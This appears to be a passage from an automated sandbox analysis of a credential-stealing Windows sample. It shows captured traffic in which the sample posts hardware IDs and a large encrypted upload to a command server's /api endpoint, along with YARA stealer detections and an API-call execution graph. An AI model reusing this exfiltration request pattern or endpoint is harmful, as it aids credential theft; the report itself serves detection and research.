                                                                                        2024-10-26 23:22:18 UTC1242OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BC02FCD6C80496ACB65E466FA2C3ADFE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-26 23:22:18 UTC1016INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=jjube5doq3f6rvlaegov931rhu; expires=Wed, 19 Feb 2025 17:08:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BkVbxI%2Bl3bxorqecYVn239%2B09ohEkVcWgqKl6shKSTmlwzS77bWgo7uMjkM54gMGcqOlzBjjOoz2mndstYRQtGU41J%2B7tNsy9gj21gOt2oeOho7w96L0X1qc%2B%2FJRKu%2FHdPa"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e300a4dc96ba9-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1129&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2159&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=d3c057755f8cbf0a&ts=362&x=0"
                                                                                        2024-10-26 23:22:18 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.68
                                                                                        2024-10-26 23:22:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.749722172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:19 UTC283OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 581658
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BC02FCD6C80496ACB65E466FA2C3ADFE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 25 8b f8 a9 59 85 63 67 13 33 6e d4 84 ed b0 64 3a 3a 69 ee 48 70 d3 ef 12 cf 35 83 87 05 10 84 ab bf 5c 69 5d 8a 02 2f 4f 8c 57 fd 6c 2e f6 ba d6 d7 1a df 3b 3e f6 d9 85 00 cc fa 19 99 39 8b 35 d2 cc a1 12 3f b9 c1 fa 8a 94 12 00 81 b6 43 09 e1 26 12 c7 88 80 b4 00 2c 2f 32 55 d2 d4 58 1a fc e0 b4 4a a4 2d ee 0a 36 f5 5c b8 4d 8a 10 6d 7f eb f5 1d d7 93 03 3a bb ff 97 40 62 77 03 ed 0a 61 10 32 eb 5b 3e 79 19 62 a8 14 97 19 4c b8 ad 3a 40 c4 17 86 4b 2b 77 16 86 6a fc 3a fe 44 92 b5 dd 58 f8 75 30 8e a6 05 68 7c a8 3f b7 b3 74 b9 83 44 30 26 b8 2a b1 2f 3a 10 c3 d8 7a fa 9c cc 52 59 ff fe 50 07 33 b3 bd d0 86 e5 17 01 8a e1 a1 df 40 aa cf 7a 4f e1 15 40 ef e7 5a 88 1e 86 b5 d5 7a 23 a5 98 d5 28 c2 e1 05 27 29 f4 f9 8f 4e 4d 12 dd 19 33 e8 59 6a 2c 34 fe
                                                                                        Data Ascii: %Ycg3nd::iHp5\i]/OWl.;>95?C&,/2UXJ-6\Mm:@bwa2[>ybL:@K+wj:DXu0h|?tD0&*/:zRYP3@zO@Zz#(')NM3Yj,4
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 09 ec 74 bb 6f 39 c6 06 56 cb c6 fe 0d fe 6a ce a9 cd a0 00 2b 47 c4 f0 b0 dc d5 73 06 0f 86 c3 b0 f7 ed a1 c7 41 9f 90 c4 2f 7c f7 73 04 1a c3 e1 3a 94 48 59 c8 27 c7 fe 3e 20 5d a0 54 71 d9 d3 c9 6e c2 d9 f9 65 65 a3 28 f2 71 39 9f 07 26 d7 f8 b4 ed 37 83 91 1e 8e 8b cd 7d 72 77 09 5c 20 9a ec 4b d4 c3 e4 7f 20 61 83 b5 f1 fd e1 59 d3 2d a5 28 3b 14 fc a8 e1 e4 9f 4b b0 37 54 b4 ca 87 7d 4b 3c f3 ca e6 1f 0f 95 da dd 28 f9 3c 10 b4 f4 6d b6 ab 6a fd 7d d9 cd 31 b4 2c 4e 79 56 1c a0 36 1c 6e 7d e6 f3 eb ec 19 2f 1e 8d d3 6b de 2d 56 31 f3 b2 e6 3a e9 cd e0 29 68 a0 43 02 94 4f d5 ae 79 0a 03 ea 8c 4e 60 73 f0 08 b7 91 35 14 e3 1a 31 2d 0b b2 26 93 bc a0 eb 86 2a e0 e9 0d d3 a7 87 2c 97 f2 d5 70 ff 17 b9 e8 69 55 99 0f 70 f0 59 12 f0 95 03 ab c9 0b b7 49
                                                                                        Data Ascii: to9Vj+GsA/|s:HY'> ]Tqnee(q9&7}rw\ K aY-(;K7T}K<(<mj}1,NyV6n}/k-V1:)hCOyN`s51-&*,piUpYI
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: c7 41 2f 9a 9a c5 f0 03 6f 71 e9 04 b2 cd 3c 77 fb 1e f2 21 80 85 61 ae 74 cb 47 f1 fb a7 59 b4 49 1d 86 8f 84 63 bd 85 f7 6f aa 88 7b 21 c0 ef f7 ee 90 82 4a fd 51 90 87 4b ee e8 f8 0a fb c7 b8 35 64 69 73 4e aa 0b 97 13 5f 0a 4d 01 01 5f 9b 1b eb 07 91 5e 97 fe bc 7c 4f 4e 83 ec 31 1b b7 7d 8e 34 62 4e 12 fc 62 a4 17 ca 85 b0 29 a1 1e 02 3d 43 dd a6 c9 d2 c8 33 1b df 8b fc d9 e7 2a df fe 4a c2 52 f5 99 be d6 90 72 83 a2 6b 36 cc 38 70 fd a6 80 bd 5b e3 09 d1 42 2d 98 1b b0 71 95 bb 5a 55 51 ae c3 3d 3f c9 a7 16 fd e0 3a f6 87 79 bc 8c 4e 97 b6 ba e6 39 90 57 64 14 1b f5 44 f3 1b 8a 66 e9 17 3f 74 00 94 a9 37 79 71 77 55 45 4b 82 9f 67 3d 48 1a d8 06 64 e7 43 bd 9d af 00 e7 b5 ae 44 83 b6 bc 5e b6 9d 64 87 b5 87 46 f1 f1 87 16 95 f2 30 8e 79 58 c4 5b a4
                                                                                        Data Ascii: A/oq<w!atGYIco{!JQK5disN_M_^|ON1}4bNb)=C3*JRrk68p[B-qZUQ=?:yN9WdDf?t7yqwUEKg=HdCD^dF0yX[
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 3f 70 42 c0 f3 71 fc 09 7e 9d ef c8 8c 27 29 f1 ed ff 5e ef c3 7b f3 97 54 c3 7f cb ec 8a 0d 19 4a fa f4 6e 4d f4 b2 7c 93 83 48 19 18 85 63 0f c3 28 df 8d 78 76 07 dc 08 e0 90 b0 be b4 db 8a 4c 39 18 65 08 60 87 cc 86 46 36 96 5a 33 2e df 64 ce 89 03 d3 67 9c 35 ef 46 19 da 09 b6 3a f1 c7 91 1b f0 6f 38 26 9f 60 7f 14 40 d8 a5 10 ec 1b 94 2d 1d 7c 3d 9c 63 02 96 44 60 b7 06 52 ff 41 2b 4f 28 75 23 d7 1f 9c 32 51 43 77 ae 0c b8 f1 6b 12 49 e6 84 97 36 a1 3c ce f8 70 ee cd 52 3e a2 59 f5 8e 26 67 f7 a1 bc b4 d7 24 70 2c 11 63 31 e6 07 89 9e a2 38 ba 02 84 76 8e 98 ef 2d 63 9e b7 e7 d8 9c 1b 0e 7c af bc 1b ca dd 52 dc e9 a4 53 ca a4 13 f0 fe 88 96 70 f5 b6 26 23 ac 22 3a db b9 3b af b8 9a 9b 57 50 82 93 c9 da 82 f8 cd 23 4f bb 97 67 20 97 cb dc 51 a5 95 7d
                                                                                        Data Ascii: ?pBq~')^{TJnM|Hc(xvL9e`F6Z3.dg5F:o8&`@-|=cD`RA+O(u#2QCwkI6<pR>Y&g$p,c18v-c|RSp&#":;WP#Og Q}
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 21 d4 71 0c 7e 2e 22 ed ad 1f aa 99 f7 59 c2 6c a9 c4 63 0f df f8 d7 5a b4 7a 7d c3 cd 29 fe 3d 58 63 00 a7 af 34 78 ae 02 4c e6 4e 7f 84 10 70 a9 ef 72 a2 2e 07 1b 0c 6d 35 6d 74 d1 b6 6c cd 42 c7 77 c6 f3 ea 1a a8 1d 79 75 84 c0 07 27 22 d8 a3 82 17 95 0e d4 ba b5 08 22 b7 81 84 76 91 8b a4 21 89 55 a1 04 ce 37 ca 4f d3 4e a1 a5 08 6e 8c 16 9d 20 6e 11 c5 08 4e 80 e2 72 28 57 96 dc 8a bd 7c 70 9f 1c 41 82 bb bd 6a 4e 6d 45 f0 8a 3b de 3b 62 3e 15 c1 ef 7f 53 f9 d4 13 57 9d 73 3e 9a 10 5e 9f 70 f5 7f 47 e3 32 70 e4 88 32 94 a5 38 18 48 be a6 09 67 be 3d 0c 16 0b 6c 68 9e d1 10 44 17 00 e2 eb 5b 9f 4e 56 5d 03 76 12 50 7b 02 cc 2f fc df 73 28 3b 2d 34 e9 3f 25 3b 18 38 a8 0f 2b 3a 36 9e 6b 4f dc 6d 0b f5 66 2e f5 f0 d8 5d 85 89 38 fc 28 f8 17 71 ba f7 0a
                                                                                        Data Ascii: !q~."YlcZz})=Xc4xLNpr.m5mtlBwyu'""v!U7ONn nNr(W|pAjNmE;;b>SWs>^pG2p28Hg=lhD[NV]vP{/s(;-4?%;8+:6kOmf.]8(q
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: ea cf 71 c9 5e 89 5a e9 5e c9 e6 ce 95 e6 ca d7 27 64 de 2b ac f4 4f fa a9 6c 6c 57 2b 3f 79 22 1b a8 db 5b 32 9e f9 88 29 28 bf c7 50 0e 83 22 c2 8c 4d fe 65 9c c7 15 63 46 a5 40 80 00 68 60 5e ce fd df 52 4b 3d c7 59 7a 07 11 c0 01 f5 62 86 71 f4 3e 90 88 24 5b 31 2a 9f 49 ec 4d 66 95 27 4a 3f 82 a7 7e e4 04 b2 b2 35 4e 6e 30 15 24 a3 41 db 51 e8 36 17 2d 56 8e a8 bd be 10 e9 c2 49 66 33 9a 62 b8 fc 0b 64 2d ec 7a b6 b5 47 72 56 05 88 93 23 32 04 67 b8 ee cb 27 35 3e eb 16 b1 b1 1c a7 40 9c a2 1d 11 c1 a1 40 b0 a1 97 04 07 9a f0 2b 51 8f c8 9c 76 f0 db f0 1a f1 9f ad 22 78 6a 76 87 59 b4 4d 22 bb 9a 7a fe 4b c9 77 18 36 09 6e ed 45 e3 7a 11 2d db 59 01 13 9d 8c 05 18 6a 78 5e 49 19 c2 cf 72 94 98 73 2a 12 10 fb 38 5c b8 0d 5c d1 c9 d6 03 21 f7 86 09 83
                                                                                        Data Ascii: q^Z^'d+OllW+?y"[2)(P"MecF@h`^RK=Yzbq>$[1*IMf'J?~5Nn0$AQ6-VIf3bd-zGrV#2g'5>@@+Qv"xjvYM"zKw6nEz-Yjx^Irs*8\\!
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: ed e1 c9 4c 28 d3 70 1d c7 07 71 0a 5f ef 33 ed 97 ca d3 a4 95 5f 20 b7 b2 79 82 21 4a 8d 9c 43 3b e5 b6 d0 a7 42 f0 5f ba fe 26 f6 58 2c 0f db d7 eb f6 77 5b 93 5a d6 c3 a3 fd ed a3 1a 92 6c c8 ec 78 ff 8d 57 43 b7 9e 67 b6 f3 77 5f 8c 54 3d 03 bf d8 4f 97 00 dd b2 91 65 f6 d1 f9 b4 63 de 92 b7 bf 98 3e 7b 7a b8 d5 77 c8 03 42 c4 a7 c1 11 47 e6 b8 3c 1e f9 7b 51 eb 03 43 ab 82 5d 5d 80 b8 b0 a5 8a 27 f3 4d fb 37 7f ad 6b 0d 4d 2a da 19 6c a9 cc 6e 1d 50 62 84 35 fe 2e f7 78 60 af 9c 21 c4 bc 4d 93 45 ee 6e ee 0b 64 de b7 f2 86 52 33 fe 99 54 1c a3 35 0d 7f aa d5 c8 0c f6 a8 99 d8 2d bd a6 20 a9 24 0d 8e a4 49 bb 4c aa 3e 58 36 00 02 ac 8c fc d0 7d 88 15 73 75 6e 23 ff 02 08 5a 3a df 54 ac cf 8d 02 44 a4 21 49 61 5e 87 a9 c7 98 d4 d6 a2 e5 06 d6 58 d3 be
                                                                                        Data Ascii: L(pq_3_ y!JC;B_&X,w[ZlxWCgw_T=Oec>{zwBG<{QC]]'M7kM*lnPb5.x`!MEndR3T5- $IL>X6}sun#Z:TD!Ia^X
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 30 8b 46 57 3a 3d fb 07 14 7e 90 94 41 3c 22 69 f4 72 9d 7b a0 90 b8 d0 f3 fe b5 e9 01 47 21 42 88 9a 78 d1 0d 69 f1 9b 58 30 a6 51 87 4f c0 a2 03 34 69 66 91 b4 26 3f d4 4d cd 68 58 b4 7c 33 72 5a ba 76 22 8b 84 d0 e5 85 71 35 4f 3a 2e 39 97 c3 96 fb 42 1a 04 7c 2e 4b dc 17 d4 1a bc d4 26 7c f5 61 eb ba 70 f7 97 90 4f a9 8a a9 b6 f8 25 51 ee f7 0e 97 9e 0f 4a 99 4d 46 1d 61 d7 07 40 a1 1d c1 9e 98 63 08 d1 8e 7b f7 be df 40 47 6f 36 c7 c8 0f df 78 2b 4f cf 61 af 9f 90 e3 9a cc eb 38 2f d8 61 3b 9f 91 a6 7a 2e b8 ad 09 40 99 27 df f2 62 92 7e 76 1e 8e 5b bf da f9 bb e3 11 20 45 50 c4 05 4d fb fe be ab 7e 15 a2 e8 3d 75 e7 11 88 75 cb 85 96 c0 d0 1a 39 78 43 96 47 b5 c3 dc 59 e3 2d aa dd aa 82 e7 46 4c cf 61 f0 b1 36 77 4a 64 b7 fc 27 01 a2 c1 a5 0b d2 c4
                                                                                        Data Ascii: 0FW:=~A<"ir{G!BxiX0QO4if&?MhX|3rZv"q5O:.9B|.K&|apO%QJMFa@c{@Go6x+Oa8/a;z.@'b~v[ EPM~=uu9xCGY-FLa6wJd'
                                                                                        2024-10-26 23:22:19 UTC15331OUTData Raw: 88 64 5f c2 fb a4 0b ff ed 8f 1f 5e e0 c1 d9 47 dc e5 c6 93 32 33 5e 0b 2d e5 c4 77 0e 3b ab 69 0f e2 89 f4 78 40 b5 df b1 55 1b e1 54 54 67 24 03 71 bc 50 60 65 06 5f 3a 5c 63 04 8c aa b9 19 1b c9 84 66 cc 3f a3 7b 41 96 59 ae d2 5e ba 74 a6 ee 02 16 61 7c 90 dd 31 57 ef 97 ec 7a bf 0d 07 7a 44 fe 0a 7d 93 d3 9f b0 71 ad ac 60 d4 98 18 90 48 b1 39 c6 f7 d9 3f 2d f3 24 28 7d 37 71 fa 60 6a b1 73 09 3b 83 d9 25 f3 c7 d8 b4 aa 0e f2 e2 1d 1a 91 a7 7f 88 b0 0b 26 db f1 c2 d9 af 00 e4 ae 47 3a e8 4f 1f 74 7a 8d 1e 18 ab 4a e5 3e a5 91 71 9b 42 0f 86 53 14 e7 11 ab e1 a9 4b 23 59 e6 42 a8 d5 e4 5e 14 2c dd 59 b8 cc b9 26 a6 91 12 e6 a8 be 26 69 1b 97 1e 87 c3 49 fb 25 68 f1 00 68 19 f3 37 cf 3a b6 81 19 19 bc 66 4c 8c a9 96 e6 8e f4 54 1e aa 7d ee 9c bf 55 24
                                                                                        Data Ascii: d_^G23^-w;ix@UTTg$qP`e_:\cf?{AY^ta|1WzzD}q`H9?-$(}7q`js;%&G:OtzJ>qBSK#YB^,Y&&iI%hh7:fLT}U$
                                                                                        2024-10-26 23:22:24 UTC1012INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=mtub4kghu1l9sj6mop4jv6ajra; expires=Wed, 19 Feb 2025 17:09:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWi8ioduehfGZrZC2We8z2oVp6BOWN%2BnkQ4mrCOlJDuInxSZX%2FjqbMRsPpv9XblP6tFTumaGlkJy0rjoWd4z0ARtkD9ihx7ifxa2orDEtvz0gVeySxOHTWxj1qVR8EIrc1eu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e30132ea8e736-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=226&recv=629&lost=0&retrans=0&sent_bytes=2839&recv_bytes=584227&delivery_rate=2049539&cwnd=59&unsent_bytes=0&cid=e87c70b7fc4deb3a&ts=4414&x=0"


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:19:22:07
                                                                                        Start date:26/10/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x470000
                                                                                        File size:2'939'904 bytes
                                                                                        MD5 hash:89EB026B1E8B37DF60728D38B5BA98BA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1367227452.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1364978590.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1348830892.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1336432602.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1349179623.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1349466810.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1335230711.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1348810433.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.4%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:57.3%
                                                                                          Total number of Nodes:246
                                                                                          Total number of Limit Nodes:26
                                                                                          execution_graph 21019 487089 21020 4870d0 21019->21020 21023 48d010 21020->21023 21022 4870f3 21024 48d190 21023->21024 21024->21024 21037 4b4520 21024->21037 21026 48d30c 21027 48d32f 21026->21027 21030 48d35e 21026->21030 21032 48d688 21026->21032 21033 48d561 21026->21033 21036 48d36d 21026->21036 21041 4b4880 21026->21041 21027->21030 21027->21032 21027->21033 21027->21036 21045 4b4950 21027->21045 21030->21032 21030->21033 21030->21036 21051 4b0f10 LdrInitializeThunk 21030->21051 21032->21032 21035 4b4520 LdrInitializeThunk 21032->21035 21033->21033 21034 4b4520 LdrInitializeThunk 21033->21034 21034->21032 21035->21032 21036->21022 21036->21036 21039 4b4540 21037->21039 21038 4b467e 21038->21026 21039->21038 21052 4b0f10 LdrInitializeThunk 21039->21052 21043 4b48a0 21041->21043 21042 4b48fe 21042->21027 21043->21042 21053 4b0f10 LdrInitializeThunk 21043->21053 21047 4b4970 21045->21047 21046 4b4a7e 21046->21030 21049 4b49ce 21047->21049 21054 4b0f10 LdrInitializeThunk 21047->21054 21049->21046 21055 4b0f10 LdrInitializeThunk 21049->21055 21051->21033 21052->21038 21053->21042 21054->21049 21055->21046 21056 48104f 21061 481054 21056->21061 21057 481378 CoUninitialize 21060 4813b0 21057->21060 21058 4979b0 LdrInitializeThunk 21062 4811f4 21058->21062 21061->21058 21061->21060 21082 48127c 21061->21082 21083 48132a 21061->21083 21094 498045 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21062->21094 21063 4812a2 21115 498045 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21063->21115 21066 48122c 21095 49ab20 21066->21095 21067 4812da 21069 49ab20 3 API calls 21067->21069 21070 4812fc 21069->21070 21072 49b070 3 API calls 21070->21072 21074 481305 21072->21074 21116 49dba0 LdrInitializeThunk 21074->21116 21084 4979b0 21082->21084 21083->21057 21085 497a20 21084->21085 21085->21085 21117 4b46d0 21085->21117 21088 497ef2 21088->21088 21122 495390 LdrInitializeThunk 21088->21122 21090 497dd0 21090->21063 21091 497c31 21091->21088 21091->21090 21091->21091 21092 4b46d0 LdrInitializeThunk 21091->21092 21093 497db7 21091->21093 21092->21093 21093->21088 21093->21090 21121 495540 LdrInitializeThunk 21093->21121 21094->21066 21096 49ab40 21095->21096 21098 49abae 21096->21098 21124 4b0f10 LdrInitializeThunk 21096->21124 21097 48124e 21105 49b070 21097->21105 21098->21097 21125 4ae1b0 21098->21125 21102 49ac63 21104 49acee 21102->21104 21128 4b0f10 LdrInitializeThunk 21102->21128 21129 4ae210 21104->21129 21133 49b090 21105->21133 21115->21067 21118 4b46f0 21117->21118 21119 4b482e 21118->21119 21123 4b0f10 LdrInitializeThunk 21118->21123 21119->21091 21122->21090 21123->21119 21124->21098 21126 4ae1d0 21125->21126 21126->21126 21127 4ae1f8 RtlAllocateHeap 21126->21127 21127->21102 21128->21104 21130 4ae228 RtlFreeHeap 21129->21130 21131 4ae2b0 21129->21131 21130->21131 21131->21097 21134 49b0f0 21133->21134 21134->21134 21137 4ae2c0 21134->21137 21138 4ae2f0 21137->21138 21139 4ae34e 21138->21139 21147 4b0f10 LdrInitializeThunk 21138->21147 21141 4ae1b0 RtlAllocateHeap 21139->21141 21143 49b155 21139->21143 21144 4ae3cc 21141->21144 21142 4ae210 RtlFreeHeap 21142->21143 21145 4ae43e 21144->21145 21148 4b0f10 LdrInitializeThunk 21144->21148 21145->21142 21147->21139 21148->21145 21149 4b154c 21150 4b1580 21149->21150 21153 4b0f10 LdrInitializeThunk 21150->21153 21152 4b15f4 21153->21152 21154 4935c2 21155 4935d0 21154->21155 21156 4b46d0 LdrInitializeThunk 21155->21156 21157 493626 21156->21157 21158 4b46d0 LdrInitializeThunk 21157->21158 21158->21157 21159 4b4c40 21161 4b4c60 21159->21161 21160 4b4d3f 21161->21160 21163 4b0f10 LdrInitializeThunk 21161->21163 21163->21160 21164 4a4ac6 CoSetProxyBlanket 21175 4a15dc 21176 4a14c3 21175->21176 21178 4a14db 21176->21178 21179 4ab7b0 21176->21179 21181 4ab7d8 21179->21181 21182 4ab8bf 21181->21182 21188 4b0f10 LdrInitializeThunk 21181->21188 21184 4ab9dc 21182->21184 21185 4abb08 21182->21185 21187 4b0f10 LdrInitializeThunk 21182->21187 21184->21185 21189 4b0f10 LdrInitializeThunk 21184->21189 21185->21178 21187->21182 21188->21181 21189->21184 21190 47cf90 21194 47cfb0 21190->21194 21191 47d1c4 ExitProcess 21192 47d1bf 21207 4b0de0 FreeLibrary 21192->21207 21194->21191 21194->21192 21200 47e1a0 21194->21200 21196 47d1b1 21196->21192 21206 480b90 CoInitializeEx 21196->21206 21205 47e1c0 21200->21205 21201 47ec20 RtlFreeHeap 21201->21205 21202 4ae210 RtlFreeHeap 21203 47e284 21202->21203 21203->21196 21204 47e485 21204->21202 21204->21203 21205->21201 21205->21203 21205->21204 21207->21191 21208 49f9d0 21218 4b3a90 21208->21218 21211 49fa9f GetComputerNameExA 21213 49fae0 21211->21213 21212 49fa30 21212->21211 21212->21212 21213->21213 21214 4a032a GetPhysicallyInstalledSystemMemory 21213->21214 21216 4a0349 21214->21216 21215 4a07c9 21216->21215 21220 4b0f10 LdrInitializeThunk 21216->21220 21219 49f9e3 GetComputerNameExA 21218->21219 21219->21212 21220->21216 21221 49a510 21228 4b5040 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21221->21228 21223 49a490 21223->21221 21224 49a3a0 21223->21224 21225 49a06f 21224->21225 21227 4b0f10 LdrInitializeThunk 21224->21227 21227->21225 21228->21223 21229 4abca9 21230 